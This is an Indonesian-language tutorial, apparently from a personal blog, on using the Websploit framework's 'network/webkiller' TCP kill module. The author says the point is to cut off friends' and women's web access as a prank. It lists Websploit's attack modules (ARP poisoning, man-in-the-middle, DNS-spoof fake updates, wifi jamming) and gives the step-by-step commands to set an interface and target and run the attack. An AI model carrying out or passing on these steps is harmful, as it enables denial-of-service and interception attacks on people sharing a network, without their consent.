ini trick sering ane gunain buat ngerjain temen yang suka buka situs bokep wkwk
dan juga cewe2 yang taunya cuman facebookan doang
trick ini ibaratnya kita memblock orang agar tidak bisa membuka situs yang kita dengan kill TCP
di websploit
ok langsung tutorial aja ya
Buka command
Command@./RkeNz_007: sudo websploit
tunggu sampai websploit buka
kedua kalau sudah muncul ketik show modules
Command@./RkeNz_007: show modules
Web Modules Description
------------------- ---------------------
web/apache_users Scan Directory Of Apache Users
web/dir_scanner Directory Scanner
web/wmap Information Gathering From Victim Web Using (Metasploit Wmap)
web/pma PHPMyAdmin Login Page Scanner
web/cloudflare_resolver CloudFlare Resolver
Network Modules Description
------------------- ---------------------
network/arp_dos ARP Cache Denial Of Service Attack
network/mfod Middle Finger Of Doom Attack
network/mitm Man In The Middle Attack
network/mlitm Man Left In The Middle Attack
network/webkiller TCP Kill Attack
network/fakeupdate Fake Update Attack Using DNS Spoof
network/arp_poisoner Arp Poisoner
Exploit Modules Description
------------------- ---------------------
exploit/autopwn Metasploit Autopwn Service
exploit/browser_autopwn Metasploit Browser Autopwn Service
exploit/java_applet Java Applet Attack (Using HTML)
Wireless / Bluetooth Modules Description
------------------- ---------------------
wifi/wifi_jammer Wifi Jammer
wifi/wifi_dos Wifi Dos Attack
wifi/wifi_honeypot Wireless Honeypot(Fake AP)
bluetooth/bluetooth_pod Bluetooth Ping Of Death Attack
modulesnya gan...ane baru nyobain yang Man in the middle attack,Fake
Update ARP poisoning, sama TCP killer yang lain belum nyoba .. kalau mau
bertanya silahkan ke guru ane Michael
Lanjut pilih modulenya lalu ketik
wsf: use network/webkiller
wsf:WebKiller >show options
Options Value RQ Description
--------- -------------- ---- --------------
Interface eth0 yes Network Interface Name
TARGET yes Target Web Address
Nah sudah jelas kan sekarang kita set apa2 yang perlu
misalkan interface kalian wlan0 jadi kita set
wsf:WebKiller >set interface wlan0
wsf:WebKiller >set target
lanjut langsung ketik run
wsf:WebKiller >run
lalu enter
dan test kalian buka
Terima kasih kunjungannya :D